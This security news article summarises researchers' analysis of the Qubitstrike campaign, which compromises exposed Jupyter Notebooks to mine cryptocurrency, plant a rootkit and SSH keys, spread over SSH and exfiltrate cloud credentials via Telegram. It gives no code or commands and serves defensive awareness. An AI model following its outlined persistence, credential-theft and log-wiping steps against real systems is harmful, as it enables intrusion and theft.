More

    Jupyter Notebooks Under Attack: Qubitstrike Launches Crypto Mining and Rootkit Campaign

    A threat actor, possibly from Tunisia, links to a new campaign. They target exposed Jupyter Notebooks for cryptocurrency mining and cloud breaches.

    This campaign, known as Qubitstrike by Cado, uses the Telegram API to exfiltrate cloud service provider credentials after a successful compromise.

    Security researchers Matt Muir and Nate Bill explain that all the campaign’s payloads are hosted on codeberg.org, an alternative Git hosting platform similar to GitHub.

    In this attack chain, publicly accessible Jupyter instances are breached to execute commands and retrieve a shell script (mi.sh) hosted on Codeberg.

    The shell script, the primary payload, does the following:

    • Executes a cryptocurrency miner
    • Establishes persistence with a cron job
    • Inserts an attacker-controlled key into the .ssh/authorized_keys file for remote access
    • Propagates the malware to other hosts via SSH.

    The malware can also retrieve and install the Diamorphine rootkit to hide malicious processes and transmit captured Amazon Web Services (AWS) and Google Cloud credentials back to the attacker through the Telegram bot API.

    Notably, the attackers rename legitimate data transfer utilities like curl and wget to evade detection.

    The shell script also iterates through a hardcoded list of process names, attempting to kill associated processes, hindering competitor mining operations.

    Furthermore, it leverages the netstat command and a hard-coded list of IP/port pairs to kill existing network connections to specific IP addresses, and it deletes various Linux log files, indicating an attempt to stay unnoticed.

    The exact origin of the threat actor remains unclear, but evidence suggests Tunisia based on the IP address used to log into the cloud honeypot with stolen credentials.

    A closer look at the Codeberg repository reveals a Python implant (kdfs.py) designed for execution on infected hosts. Discord acts as a command-and-control (C2) mechanism for uploading and downloading.

    The connection between mi.sh and kdfs.py is unclear, but it’s suspected that the Python backdoor helps deploy the shell script. Mi.sh can also function as standalone malware without relying on kdfs.py.

    In summary, Qubitstrike is a sophisticated malware campaign focused on exploiting cloud services. While its primary objective appears to be mining the XMRig cryptocurrency, analysis of the Discord C2 infrastructure suggests that the operators could carry out various attacks once they gain access to vulnerable hosts.

    Latest articles

    Related articles